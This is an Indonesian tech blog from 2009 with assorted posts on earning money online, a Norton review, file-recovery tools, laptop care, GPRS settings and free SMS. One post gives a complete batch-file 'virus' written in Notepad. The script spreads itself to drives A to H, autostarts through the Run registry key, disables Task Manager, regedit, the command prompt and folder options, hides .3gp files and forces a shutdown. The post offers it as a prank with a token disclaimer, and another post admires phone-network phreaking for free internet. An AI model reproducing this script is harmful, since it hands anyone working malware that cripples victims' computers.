Sebenarnya banyak sekali program-program yang bisa menghasilkan uang dari internet. Namun tipe bisnis yang populer dan yang paling banyak diminati dari kalangan pemula sampai yang expert adalah :

  1. Affiliates (Program affiliasi)
  2. Pay Per Click (Di bayar per klik)
  3. Pay Per Search (Di bayar ketika mencari)
  4. Pay Per Put (Dibayar Per Kontrak Iklan yang dipasang)
  5. Pay Per Sale (Dibayar jika terjadi penjualan)
  6. Pay To Click (Dibayar untuk klik iklan yang disediakan)
  7. Domain Parking (parkir Domain)
  8. Pay Per Lead (Dibayar per prospek)
  9. Dan Lain sebagainya...

Ket : Semua tipe bisnis di atas anda akan di bayar dengan menggunakan dolar. Dan Banyak sekali orang-orang dari indonesia yang sukses dan merapun ratusan bahkan ribuan dolar dengan program tersebut.

Dari tipe bisnis di atas, bisnis mana yang sudah anda jalankan?

More aboutBanyak cara menghasilkan uang dari internet

Berduka Cita-Internet Gratis TelkomShit dah K0id

Posted by Kopenx Blog on Friday, March 6, 2009

Akhirnya setelah sekian lama menikmati internet gratis telkomsel flash akhirnya trik gprs gratis dengan menggunakan kartu ini tidak bisa digunakan lagi. sebenarnya ada beberapa macam trik yang dapat digunakan dalam trik internet gratis telkomsel flash ini. Semuanya berawal dari tidak bisanya berinternet gratis dengan always vpn, yaitu semacam... software open vpn. saya (mungkin blog sahabat yang lainnya yang juga menggunakan trik ini) berasumsi bahwa karena versi gratis dari software ini sudah di hentikan. Ternyata beberapa hari kemudian menyusul giliran trik internet gratis dengan menggunakan your freedom juga tidak bisa lagi digunakan, sepertinya pihak operator telah menutup celah-celahnya. Tapi saya yakin para phreaker-phreaker di indonesia ini masih punya cara untuk memanfaatkan bugs-bugs dari operator.

Akhirnya kembali ke jalan warnet dan pulsa. tapi sementara ini yang paling murah adalah telkomshit dan indoshit.

Sebenarnya ada trik XL yang masih bisa di pakai, tepi saya belum coba dan akan masih dalam penelitian, Postin9 ga yah..hehe :p


More aboutBerduka Cita-Internet Gratis TelkomShit dah K0id

Norton Anti Virus 2009 Review & Downloads

Posted by Kopenx Blog on Monday, March 2, 2009

Anti virus merupakan software pengaman yang bisa dikatakan wajib di gunakan pada setiap komputer untuk mengamankan virus-virus baik lewat internet maupun lewat flasdisk sebagai media penyebarannya. Kali ini saya mencoba mereview anti virus norton 2009 yang di klaim membutuhkan resource yang paling ringan di dunia. :D

Sebagai perlindungan dasar terhadap serangan, Norton 2009 memiliki fasilitas untuk mendeteksi otomatis terhadap virus dan spyware yang akan menyerang sistem komputer anda. Agar proteksi selalu optimal, Symantec menyediakan fitur yang dinamakan "Pulse update" yang dapat melakukan update secara otomatis setiap 5 sampai 15 menit bila komputer terhubung ke internet. Selain itu, Symantec juga mengklaim bahwa anti virusnya kini lebih mudah digunakan dan bisa bekerja lebih cepat dibanding sebelumnya. Wow!


Inilah fitur-fitur yang terdapat pada Anti Virus Norton 2009 :

1. Norton Insight, merupakan fitur dapat meningkatkan kecepatan proses scan. itur ini sebenarnya menjadi teknik "whitelist", yaitu dengan melakukan pengumpulan data terhadap file yang secara umum menurut sistem dipercaya tidak mengandung virus, sehingga nanti file tidak melewati proses deteksi, cara ini akan memotong waktu scan.

2. Rapid Pulse, teknologi yang memungkinkan anti virus update setiap 5 sampai 15 menit juga menglaim sebagai sistem terbaik dalam hal ini dibandingkan dengan anti virus yang lain.

3. SONAR (Symantec Online Network for Advanced Response), ini adalah salah satu sistem yang memiliki kemampuan untuk mengidentifikasi malware dan serangan baru atau tanda-walaupun belum ditemukan di database antivirus tersebut. Teknologi dengan sistem seperti ini sejak lama ditanamkan pada norton versi sebelumnya dan di norton 2009 telah mengalami perbaikan sehingga akan lebih efisien dalam prosesnya. Selain dapat mendeteksi virus baru, juga dapat membersihkan file yang terinfeksi virus tanda tangan walaupun belum ditemukan di database.

4. Norton 2009 memiliki fitur khusus untuk perlindungan browser seperti internet explorer dan mozilla firefox dari serangan berbasis web atau phishing.

5. Silent Mode, fungsi ini akan menghapuskan beberapa dengan peringatan akan melakukan update secara otomatis, sehingga tidak akan mengganggu aktivitas dari pengguna akan seperti saat ini bermain game, menonton film, atau melakukan presentasi.

6. Smart Scheduler, fitur yang memungkinkan proses scan, update, dan lainnya secara terjadwal jika komputer dalam keadaan stanby.

7. Dan tentunya selain melakukan improvisas
i dan pembaharuan dalam sistem databasenya, terhadap versi-versi sebelumnya. Norton mengklaim bahwa anti virus ini akan sangat mudah di gunakan atau user friendly serta jauh lebih cepat dalam pengoperasiannya.

8. Pada opsi Internet setting, anda dapat mengatur aktivasi proteksi di browser, e-mail, instant messenger, dan dapat melakukan pencegahan terhadap gangguan yang berpotensi mengandung spyware, malware atau virus. anda juga dapat memilih dan mengaktifkan sistem proteksi tersebut atau tidak. Khusus aplikasi instant messenger yang didukung oleh Norton 2009 adalah Yahoo, MSN, AOL, dan Trilian. Pada pencegahan terhadap gangguan, Symantec memberikan pilihan siapa saja yang tidak diblokir, blokir otomatis, dan pemberitahuan setiap kali ada percobaan dari luar yang berpotensi merusak, misalnya penerobosan sistem.

UJI COBA

Untuk Instalasi norton relatif cepat, dalam jangka waktu hanya kurang lebih 1,5 menit sudah bisa selesai dilakukan. Yang perlu Anda lakukan di tengah-tengah instalasi software ini hanyalah memasukkan product key softwarenya saja. Sisanya, Symantec yang mengurus. Salah satu kelebihan lagi yang dimiliki norton 2009 ini adalah anda tidak perlu melakukan restart setelah instalasi software selesai. Keren! :D

Setelah saya selesai melakukan instalasi, karena komputer saya terhubung ke Internet, maka saya dapat langsung menjalankan fitur Live Update.

Tiga hari kemudian, saya mencoba menjalankan Live Updatenya lagi ... eh.. sudah ada update terbaru yang perlu diinstalasikan. setelah instalasi ternyata updatetannya hanya berukuran 1,34MB. Sayangnya tidak ada detail mengenai apa saja yang ditambahkan ke database.


Sedikit Kesimpulan :


Secara umum Norton 2009, Norton 2009 adalah software anti virus yang mudah dan ringan untuk digunakan. Fitur-fitur yang tersedia dan kecepatan update yang ada membuat Anda bisa berkomputer dengan lebih aman. Fitur khusus pulse update pada anti virus ini anda bisa melihat dan memeriksa secara otomatis (berjalan di background) apakah ada update terbaru yang perlu didownload. Fitur ini sangat penting bagi anda pengguna komputer, sering lupa atau malas melakukan update.

Sekedar informasi, sebagus apapun dan secanggih apapun fitur yang di sediakan pada anti virus, jika tidak di update percuma saya. Padahal itu yang paling penting untuk security komputer anda :)

Download anti virusnya disini

Jika ada yang kurang silakan di tambahkan. kita diskusi...

More aboutNorton Anti Virus 2009 Review & Downloads

6 Recovery File Terbaik

Posted by Kopenx Blog on Friday, February 27, 2009

Pernahkan anda mengalami kejadian buruk dimana hasil pekerjaan atau dokumen anda yang telah disimpan di komputer hardisk anda secara tidak sengaja telah terhapus?? Hmm... pasti sangat menjengkelkan... Tapi tenang saja, saya akan merekomendasikan kepada anda 6 perangkat software recovery yang ampuh untuk menyelamatkan file di hardisk anda yang telah terhapus atau terformat. Software tersebut freeware tentunya :)

Tapi sebelum itu ada beberapa hal yang perlu anda ketahui sebelum merecovery file di hardisk yang telah terhapus atau terformat, dimana ketika file di hardisk anda sudah terhapus atau terformat, usahakan jangan mengcopykan file apapun ke dalam drive yang telah berisi file atau dokumen anda karena kemungkinan sektor hardisk yang berisi dokumen yang telah tehapus tadi akan tertiban dengan copy-an dokumen baru anda. Itu akan menyulitkan software dalam merecovery data atau dokumen anda. Hal tersebut juga menjadi salah satu penyebab dokumen anda yang telah berhasil di pulihkan , tetapi tidak bisa dijalankan atau file korupt.

1. Recuva

Software recuva merupakan freeware windows utility untuk memulihkan file yang terhapus dati hardisk komputer anda termasuk file yang telah di kosongkan dari Recycle bin serta foto dan file lainnya yang telah dihapus akibat kesalahan dari kartu memori atau flashdisk. Bahkan software ini akan membawa kembali file yang telah dihapus oleh bug, crash atau viris!

Download recuva File Recovery







2. PC Inspector File Recovery

PC Inspector File Recovery dalah program pemulihan data yang mendukung FAT 12/16/32 dan NTFS file sistem. Salah satu keunggulannya adalah bisa menemukan partisi secara otomatis, bahkan jika boot sector atau FAT telah terhapus atau rusak. Recovery file asli dengan waktu dan tanggal yang dapat ditentukan. Selain itu softwareini bisa juga menyimpan file yang dipulihkan pada drive jaringan. Bahkan ketika sebuah header masuk tidak lagi tersedia. Setup file is 5.83 MB in size. Setup file 5,83 MB.

Download PC Inspector File Recovery




3. Pandora Recovery

Pandora Recovery memungkinkan anda untuk mencari dan memulihkan kembali file yang telah terhapus dari hardisk komputer anda dengan volume tipe NTFS. Yang di recovery bisa file gambar, lagu, film atau documen, Setup file sekitar 2,12 MB.

Download Pandora Recovery










4. Tokiwa DataRecovery

DataRecovery adalah freeware yang di rilis oleh perusahaan TOKIWA yang berfungsi untuk memulihkan data yang mendukung FAT12, FAT16, FAT32 dan NTFS. Software ini tidak memerlukan setup. Jadi software ini portable dan cocok untuk di simpan dalam flashdisk.

Download Tokiwa DataRecovery








5. SoftPerfect File Recovery

SoftPerfect File Recovery merupakan software yang mudah digunakan dan sama seperti Tokiwa DataRecovery. Yaitu tidak adanya instalasi yang diperlukan. Ukuran program ini sekitar 247 KB.

Download SoftPerfect File Recovery












6. Undelete Plus

Sotware ini dapat berjalan pada windows 95/98/Me/NT/2000/XP/vista dan tidak memerlukan instalasi (portabel) dalam pengoperasiannya.

Download Undelete Plus
More about6 Recovery File Terbaik

Bagaimana Cara Merawat Notebook Agar Lebih Awet

Posted by Kopenx Blog on Wednesday, February 4, 2009

Notebook atau istilah umumnya laptop sudah bisa dikatakan barang yang wajib dimiliki oleh pebisnis dan mahasiswa. Bagaimana tidak komputer dengan mobiltas tinggi akan membantu memudahkan pekerjaan atau tugas-tugas di kantor ataupun di kampus. Apalagi sekarang notebook di banderol dengan harga yang semakin terjangkau saja. Dengan uang 5-6 juta-an saja, kita sudah bisa memiliki notebook dengan spesifikasi yang cukup memadai dalam membantu pekerjaan anda. Misalnya aplikasi Microsoft office, photoshop, corel draw dan lain-lain. Apalagi jika nambahin uang dikit lagi, notebook dengan prosesor core2 duo bisa anda miliki.

Akan tetapi notebook menginginkan perhatian lebih dalam perawatannya. Jika tidak maka bisa dipastikan notebook anda relatif tidak akan memiliki umur yang panjang. Entah sengaja atau tidak, pada umumnya konsumen tidak di kasih tahu tentang bagaimana tips merawat dan menggunakan notebook secara aman dan lebih awet. Untuk itu saya punya sedikit tips dalam merawat notebook agar lebih awet.: Berikut tipsnya

TIPS MERAWAT NOTEBOOK/LAPTOP :


1. Jika menggunakan AC adaptor/charger, pastikan terlebih dahulu tersambung ke listrik PLN sebelum tersambung ke notebook.

Memang terlihat spele, namun notebook rentan terhadap tegangan listrik yang mendadak dan tidak stabil. Di salah satu situs blog disebutkan bahwa akibat tegangan listrik yang mendadak bisa menyebabkan kerusakan pada merek tertentu yang mengakibatkan laptop terus me-restart padahal sudah di shutdown (jika baterai terpasang), atau meminta password factory default (beberapa kasus terjadi di merk toshiba, biaya reset password saja hingga 500 ribu!! ) dll. Untuk itu pasanglah AC charger dengan benar. Yaitu :


PASANG ADAPTOR KE AC PLN=>>BARU MASUKAN KE NOTEBOOK/LAPTOP.

2.
Jika anda tidak menggunakan UPS, lebih baik jangan lepaskan baterai.

Seperti penjelasan no.1 bahwa notebook rentan terhadap loncatan arus seperti listrik mati mendadak dan konsleting. Jika pada saat kondisi baterai anda tidak terpasang (menggunakan adaptor). Maka ketika listrik PLN mati mendadak, notebook juga akan mati seketika. Ini sangat berbahaya, bahkan pada kondisi tertentu LCD monitornya juga bisa rusak. Misalnya dead piksel dan dll.

3.
Hati-hati!! Gunakan pemakaian baterai dengan aman dan bijak.

Sekedar info saja, harga baterai notebook original lumayan mahal. Berkisar antara 1 juta sampai 1,5 juta!! Baterai dengan tipe Li-Ion pada notebook tidak boleh dipakai sampai habis sekali (kosong) ataupun tidak boleh over charge. Jika baterai over charge bisa menyebabkan baterai nge-drop dan cepat bocor). Idealnya adalah notebook di charge ada saat indicator baterai menunjukan 10%-20%. Dan bila sudah penuh anda bisa mencabut charger dari notebook.

Jika notebook akan digunakan cukup lama dan tidak kemana-mana, anda tidak perlu mencabut charger dari notebooknya. Karena untuk notebook sekarang koneksi charger terhadap baterai akan terputus secara otomatis jika baterai sudah penuh. Jadi jangan kuatir baterai notebook anda over charge.

Pada sebagian blog lain menyebutkan bahwa jika akan digunakan pada waktu lama dengan adaptor, baterai harus di lepaskan. Wah.. Justru itu tidak saya rekomendasikan dan lebih beresiko karena baterai memiliki beberapa tegangan cabang yang salah satunya untuk membackup dan memprotect kalau ada tegangan listrik mendadak atau tidak stabil dan menjaga agar notebook tidak mati mendadak.

Tetapi jangan biarkan baterai anda penuh secara terus menerus dalam janga waktu yang lama (mentang-mentang pake adaptor) karena cel baterai akan terbebani dan mengakibatkan baterai tidak optimal. Untuk itu gunakanlah baterai (tanpa adaptor) setidaknya 4-5 hari sekali dan isi kembali setelah mencapai 10%-20%.

Jika baterai tidak terpakai, jangan biarkan baterai anda kosong sama sekali. Untuk menjaga agar selnya tetap utuh, idealnya baterai di isi seperempat atau setengahnya. Itulah sebabnya ketika anda memasang baterai baru, mempunyai daya sekitar setengah atau seperempatnya. Simpan baterai jika tidak dipakai dalam jangka waktu yang lama pada lemari es (jangan di masukan ke freezer!) yang di bungkus dengan plastik yang tidak lembap. Ini untuk memastikan bahwa kinerja sel baterai akan tetap terjaga. Jika ingin digunakan kembali, diamkan dulu baterai yang telah disimpan pada lemari es sampai suhunya normal kembali (mencapai suhu ruangan).

4.
Kalibrasi baterai 1-2 bulan sekali

Mungkin anda bertanya, untuk apa baterai notebook di kalibrasi? Ini untuk menjaga agar pembacaan indicator baterai pada notebook tetap akurat. Lalu bagaimana cara mengkalibrasinya?? Mudah saja. Anda tinggal mengisinya sampai penuh, kemudian menggunakannya pada pemakaian normal sampai baterai benar-benar habis. Komputer akan stanby otomatis jika indicator telah menunjukan baterai akan habis. Selain itu tips ini juga bisa anda gunakan untuk mengukur kondisi daya tahan baterai.

5.
Hati-hati! Jangan menaruh beban di atas layar notebook anda!

Ini cukup spele tapi resikonya sangat tinggi. Jangan menaruh beban di atas layar notebook meskipu notebook telah tertutup terutama baban yang berat seperti buku, adaptor, tas berisi CD dll. Perlu diketahui bahwa LCD adalah komponen yang memiliki harga yang paling mahal di bandingkan komponen notebook yang lainnya! Harganya bisa mencapai 2 juta sampai 2,5 jutaan! Kerusakan yang umum terjadi pada LCD notebook adalah dead piksel, muncul garis-garis dengan warna tertentu, dan retak jika kondisi parah (terbentur).

6.
Jangan menggunakan/menyimpan notebook diatas kasur atau bantal

Ini juga spele. Pada sebuah notebook terdapat kipas pendingin prosesor yang berputar untuk menjaga sirkulasi udara agar tetap stabil. Anda bisa lihat kipas ini di bawah notebook anda. Jika kipas ini tertutup. Maka sirkulasi udara tidak akan normal. Akibatnya notebook akan cepat sangat panas dan sangat berbahaya! Dalam kondisi parah bisa menyebabkan motherboard atau prosesor anda rusak karena terbakar akibat overheat.

7.
Gunakan Screen protector dan keyboard notebook jika perlu.

Jika anda adalah orang jang kurang hati-hati dalam pemakaian notebook. Saya sangat merekomendasikan anda untuk menggunakan screen protector dan keyboard protector. Ini akan melindungi LCD monitor anda dari goresan yang tidak di sengaja. Karena jika LCD sudah tergores tidak akan bisa dikembalikan seperti semula. Selain itu dengan pemakaian screen protector akan mamudahkan anda dalam pembersihannya.

Jika dengan tidak sengaja keyboard anda terkena tumpahan cairan, segera balikan notebook anda dan lap dengan kain yang lembut, setelah itu keringkan sampai benar-benar kering. Jika perlu gunakan hair dryer secukupnya. Jika anda ragu-ragu bisa minta bantuan service centernya saja.

8.
Hati-hati menggunakan plug-plug pada notebook

Slot USB, LAN dan slot audio perlu diperhatikan juga. Ketika salah satu atau semua plug pada notebook anda terpasang, jaga jangan sampai notebook bergeser arah secara tidak aman yang dapat menyebabkan slot terhimpit, tertarik dll yang berakibat plug pada notebook tersebut cepat longgar. Ingat! Plug-plug tersebut sudah menyatu dengan motherboard. Jika salah satu ada yang rusak, berarti anda harus megganti motherboard dengan yang baru! Kecuali anda bawa ke service yang professional dan bisa mengganti salah satu plug yang rusak tersebut. Sekedar informasi, harga motherboard notebook berkisar 1 juta sampai 1,5 juta rupiah.

Segitu saja tips dari saya, ada yang mau menambahkan silakan ataupun curhat seputar pengalamannya. Yang nanya pasti saya jawab jika bisa.


Artikel asli oleh: http://kopenx.blogspot.com

More aboutBagaimana Cara Merawat Notebook Agar Lebih Awet

Agar Koneksi Internet Tidak Terputus-Putus

Posted by Kopenx Blog on Sunday, February 1, 2009

Jika anda menggunakan dial up sebagai koneksi internet anda di rumah atau di mana saja, katakanlah koneksi yang anda gunakan adalah melalui handphone anda sebagai modem (GSM atau CDMA) dan dihubungkan ke komputer agar bisa terhubung dengan internet. Misalnya operator yang anda gunakan adalah indosat, simpati, xl atau yang lainnya yang tidak saya sebutkan. Koneksi internet yang lancer itu sangat penting bagi semua orang yang browsing terutama anda sebagai blogger sejati yang selalu mempunyai inspirasi dan artikel untuk ditulis dan dipublikasikan. Tidak seperti saya he..he.. :D

Bayangkan jika koneksi internet ditempat anda kurang begitu baik, udah lemot, sering terputus sendiri! Mudah-mudahan tidak selalu seperti itu ya…tapi bagi yang benar-benar mengalaminya, saya punya sedikit tips untuk meminimalisir hal tersebut.

Lalu bagaimana cara mengatasinya? Banyak cara yang bisa dilakukan, seperti gonta-ganti proxy dan lain-lain. Tapi yang saya coba rekomendasikan disini adalah dengan menggunakan sebuah software sederhana. Fungsi software ini adalah untuk “me-dial” secara otomatis dengan waktu yang dapat kita tentukan sekehendak hati anda. Software ini sebenarnya udah lama dibuat, tapi fungsinya tetap berguna sampai sekarang.







Untuk bisa menggunakan softwarenya anda bisa mendownloadnya disini

Jika menemui kesulitan share aja disini otreh ;)

More aboutAgar Koneksi Internet Tidak Terputus-Putus

Membuat Virus Ampuh Hanya dengan Notepad

Posted by Kopenx Blog on Friday, January 30, 2009

Pada saat sekarang ini perkembangan virus lokal maupun virus bule makin berkembang pesat saja.

Kebanyakan orang berpendapat bahwa membuat virus itu perlu menguasai bahasa CC+, atau VB script atau bahasa assembly. Wah bias botak tuh rambut :D

Kali ini saya akan berbagi sedikit tentang cara membuat virus hanya dengan menuliskan program sederhana di sebuah notepad. Lho? Koq bisa?

Ya bisa lah…virus yang akan kita buat ini akan secara langsung mengacak-acak registry windows. Bahkan untuk antivirus tertentu dengan update terbaru pun tidak akan bisa mendeteksinya. Lumayan banget kan buat iseng :D tapi kalo ada apa-apa saya tidak bertanggung jawab ya. Maka dari itu gunakan saja secara bijak dan jangan digunakan untuk kejahatan..hehe

Ok, langsung kita mulai saja tutorialnya:

  1. Buat sebuah halaman notepad kosong yang terdapat pada windows anda. Start->All Programs->Accessories->notepad
  2. Buat script berikut :

    //Listing program// >>baris ini jangan ikut ditulis

    1. Echo off > C:\virxx.txt

    2. if no exist C:\Windows\%0 copy %0 C:\Windows

    3. for %%p in (A C D E F G H) do copy %0 %%p:

    4. for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt

    5. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

    6. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

    7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

    8. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f

    9. for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s

    10. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

    11. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d C:\Windows\virxx.bat /f

    12. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f

    13. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f

    14. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f

    15. Shutdown -s -t 360 -c "Virus Menjangkiti Komputer Anda" -f

    16. Exit

  3. Simpan dengan nama apa saja, tapi jangan lupa simpan dengan extensi .bat misalnya : virus.bat. Dan pada save as type nya pilih All Files.
  4. Ada Bisa saja menambahkan atau mengurangi list script virus di atas. Asalkan anda mengetahui dasar dasar registry windows.
  5. Jika ingin computer anda terkena bencana, silakan klik file yang telah anda buat tadi sekaligus untuk memastikan bahwa virus telah berjalan dengan baik. Tetapi jika tidak, ya jangan di klik :D

Sekedar informasi saja, virus jika bekerja akan menghilangkan task manager, run, regedit, folder option, dan akan menyembunyikan file yang berekstensi *.3gp dengan super hidden. Selain itu virus akan berkembang biak dengan mengkopykan dirinya ke drive A, C, D, E, F, G, dan H. pokoknya mantep.

Selamat mancoba!

More aboutMembuat Virus Ampuh Hanya dengan Notepad

Review Notebook Acer eMachine D720

Posted by Kopenx Blog on Thursday, January 29, 2009

Ketika beberapa waktu lalu saya membeli seperangkat notebook baru untuk menggantikan computer lama saya. Notebook yang saya inginkan adalah spesifikasi notebook yang bagus dan murah. Dan yang paling penting jangan sampe ketipu kali yah :D

Setelah melihat dan menimbang budget, akhirnya diputuskan membeli notebook acer eMachine D720. Notebook ini bisa dikatakan notebook yang cukup unik dengan spesifikasi yang menggiurkan. Kalau tidak salah notebook acer eMachine adalah notebook yang pertama kalinya dikeluarkan di jepang pada sekitar bulan September 2008 yang diperuntukan bagi kaum pelajar dengan spesifikasi yang minim yang mengusung intel Celeron didalamnya. Tapi seiring banyaknya permintaan akan notebook ini, menurut info yang saya dapat dari orang acer bahwa beberapa bulan kemudian eachine ini akan memiliki tipe lagi untuk kalangan high-end dengan spesifikasi yang jauh lebih tinggi.

Untuk Acer eMachine yang saya beli adalah tipe D720 dengan spesifikasi sebagai berikut:

  1. Prosessor Intel Dual Core 2,16 Ghz
  2. Memory RAM default 512 MB Up to 4 GB
  3. Hardisk 160 GigaByte SATA Merk Hitachi
  4. VGA intel 256 (shared)
  5. LCD 14" wide screen cristal bright (lebih bagus daripada LCD TFT biasa dan tampak lebih mengkilat)
  6. DVD RW super multi double layer
  7. Terdapat 3 channel sebagai media output, input audio dan input microphone
  8. Webcam dan microphone terintegrasi
  9. WiFi
  10. Os Linux (yang ini ada yang pake ada yang nggak tergantung dikasihnya atau nego)
  11. Warna Hitam
  12. Garansi resmi acer 1 tahun, karena nego saya dapat tambahan garansi toko 3 tahun :D

Nah saya kira dengan fitur seperti itu untuk kelas harga kurang lebih 6 jutaan adalah termasuk spesifikasi yang bagus untuk kelas acer. Pada pembelian kemarin saya mengupgrade memorinya menjadi 1 GB. Berikutnya karena saya terbiasa dengan windows Xp maka saya harus menginstal ulang dan mengganti dengan windows xp sekalian mempartisi ulang hardisknya. kesempatan saya juga untuk "test drive" notebook tersebut.

Hasil review saya :

  1. Untuk LCD monitornya enak bener, selain ukurannya sedikit lebih besar dari yang berukuran 14" biasa (14" wide screen) juga tipe LCD nya adalah TFT cristal bright dengan warna yang lebih cerah dan terang. Ketika layar di matikan akan tampak hitam mengkilat.
  2. Hardisk yang digunakan besar (160) GigaByte SATA dengan kecepatan standar untuk kelas SATA
  3. Notebook ini tidak berisik dan relatif "dingin" ketika beroperasi yang memerlukan kinerja prosessor lebih. Waktu itu saya coba menjalankan adobe photoshop, coreldraw 12 dan windows media player sekaligus dan dapat berjalan dengan cepat dan lancar.
  4. Kipas pendingin prosesor berada di sebelah kiri belakang.
  5. Mouse touch pad kurang nyaman, karena bidang pad touch nya menyatu dengan bodynya dan terdapat titik-titik area touchnya. Otomatis ketika kita menggeserkan jari kita akan sedikit "seret". Berbeda dengan notebook lain yang standar dengan bidang touch pad sekelasnya.
  6. Speaker audio internal yang terdengar cukup bagus. Tidak cempreng dan empuk terutama nada treblenya terdengar sangat mantap.
  7. Untuk channel audio untuk external saya coba hubungkan dengan speaker aktif. Dan suaranya terdengar mantap. Tapi hal ini standar mengingat hardware audio yang sudah ada pada notebook ini menggunakan teknolgi baru yang sekelas Audio high definition. Ini saya tahu dari driver softwarenya.
  8. Wifi Standar
  9. Sayang port USB nya hanya ada dua yang terdapat di kiri. Tapi untuk hal ini tidak apalah.
  10. VGA port untuk dihubungkan dengan monitor luar standar.

Prinsipnya saya puas dengan notebook ini. Apalagi kata orang acer sendiri notebook ini dijamin awet dibandingkan notebook lokal sekelasnya dengan harga yang menurut saya cukup murah. Segitu saja reviewnya. Ada yang mau nambahin?

More aboutReview Notebook Acer eMachine D720

Membuat Kartu Ucapan Grafis

Posted by Kopenx Blog on Wednesday, January 21, 2009

Tahukah anda bahwa kartu ucapan bisa dikirim dengan cara elektronik dengan memanfaatkan media internet? dari mengirimkan kartu ucapan idul fitri, natal ataupun tahun baru yang semakin dekat. Lalu darimana softwarenya?

Yang gratis-gratis itu memang enak ya :) untuk membuat kartu ucapan bisa memakai GIMPP situsnya http://www.gimp.org. Kata orang-orang ini disebut juga photoshopnya linux. Atau bisa juga pakai photopaint. KAlau membuat kartu ucapan dalam format vektor, coba pakai inkscape situsnya http://inkscape.org.

Selanjutnya tinggal kreativitas masing-masing deh yang menentukan kartunya jadi seperti apa. Seperti apapun jadinya pasti Ok's banget deh ;) Selamat mencoba!
More aboutMembuat Kartu Ucapan Grafis

Cara Jitu Memasang File Flash Di Blogspot

Posted by Kopenx Blog on Friday, January 16, 2009

Memajang file flash pada suatu website pasti akan tampak cantik dan membuat pengunjung akan betah melihatnya. Tapi Untuk di blogspot file flash tidak bisa tampil dengan cara biasa. Flash adalah file yang memiliki extensi *.swf. file ini cocok dipasangkan pada file tengah atau file header blogspot anda. Lalu bagaimana cara mengakalinya agar file flash bisa tampil pada blogspot? saya bakal kasih tau triknya...

Pertamax, file flash yang akan anda tampilkan di blogspot harus di simpan/diupload terlebih dahulu pada server yang lain. dalam hal ini anda bisa gunakan server gratisan seperti 50megs.com, geocities.com dan lain-lain.

Kedua, Login ke blogger kemudian pilih menu "Layout".

Ketiga, Anda Kemudian klik link "Add a gadget" pada layout yang tersedia dimana akan ditempatkan animasi flash.

Keempat, Pilih "HTML/Javascript" kemudian pasang script berikut :

src="%20http://alamat_file_flash_anda/header.swf%20" quality="high" bgcolor="white" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi? P1_Prod_Version=ShockwaveFlash" width="500" height="90">

Selesai... Silakan Ganti angka piksel pada width="500" height="90" dengan ukuran dari file flash anda atau sesuai keinginan. Jika tidak tahu ukuran file flash yang anda pasang. silakan klik kanan pilih properties atau silakan coba-coba saja.

Selamat mencoba.
More aboutCara Jitu Memasang File Flash Di Blogspot

Tarif GPRS Super Murah Meriah

Posted by Kopenx Blog on Tuesday, January 13, 2009

Meskipun agak telat, saya akan mencoba menjelaskan mengenai pulsa khusus gprs ini.

Pulsa gprs ini diperuntukan bagi pengguna indosat (GSM) yang dikeluarkan indosat sekitar bulan lalu. Tertarik?
Pulsa gprs untuk saat ini hanya tersedia yang 5000 saja dan itupun sistem pengisiannya masih elektric dan belum ada voucher fisiknya. Di lapangan ditemukan banyak yang sudah menjual ramai produk voucher electric khusus gprs ini. Tapi ada juga yang "gak mudeng" dan katanya baru denger ada pulsa khusus gprs. ya sudah tidak apa-apa lah.

Untuk setiap pengisian 5000, akan berubah menjadi saldo yang bukan berupa harga dalam rupiah, tetapi dalam menit. Untuk pengisian 5000 kita bisa internetan selama 250 menit!! Murah kan daripada di warnet 4 ribu atau 5ribu cuma dapat se-jam saja. Tapi sayang kualitas jaringannya bisa di bilang masih kurang memadai. tapi itupun tergantung lokasi dan tempat nya juga sih.

Untuk setingannya gampang-gampang aja :

1. Untuk pengguna im3 :
User : indosat@durasi
Password :indosat@durasi
Untuk cek pulsa gprs anda tekan *388*1#

2. Untuk pengguna Mentari :
User : indosat@durasi
password : indosat@durasi
Untuk cek pulsa gprs anda tekan *555*1#

Untuk kecepatan data gprs dari tempat saya sih lumayan bagus. bagaimana dengan anda? :)


More aboutTarif GPRS Super Murah Meriah

SMS Gratis Ke Nomor Apa Saja Termasuk Luar Negeri

Posted by Kopenx Blog on Saturday, January 10, 2009

Telah kita ketahui Sms adalah hal yang sudah tidak asing lagi bagi kita. bagaimana tidak di jaman IT saat ini, mulai dari komunikasi biasa, sampai media promosi bisnis baik online maupun offline menggunakan sms. Meskipun sms pada saat sekarang ini semakin murah, tapi sebagai media promosi ke nomor tujuan yang sangat banyak apalagi sampai ke tujuan nomor luar negeri, berapa coba yang harus kita keluarkan?? Biayanya lumayan bukan? Mending dipake telpon aja atau ngenet :D. Sebenarnya banyak layanan sms gratis yang ditawarkan terutama yang menggunakan server dari luar. adapun perusahaan yang menyediakan layanan sms ini adalah dari http://www.ecall.ch.
Cara daftar sms gratis di www.ecall.ch:
1. Masuk ke web ecall pada browser anda, kemudian pilih bendera negara inggris untuk web dalam bahasa inggris.
2. Klik Free Registration untuk user baru. Kemudian isi form isian data pribadi anda, email dan user id.
3. Setelah berhasil, anda akan memperoleh password yang dikirimkan lewat email. Anda harus menggunakan password setiap kali login.
CARA PENGIRIMAN SMS MELALUI ECALL:
1. Masuk ke web ecall dan login dengan user dan password anda.
2. Setelah berhasil login, anda bisa memilih jenis jenis sms yang ingin anda kirimkan pada bagian kiri halaman web. Anda juga bisa menyimpan nomor-nomor HP tujuan anda pada address book.
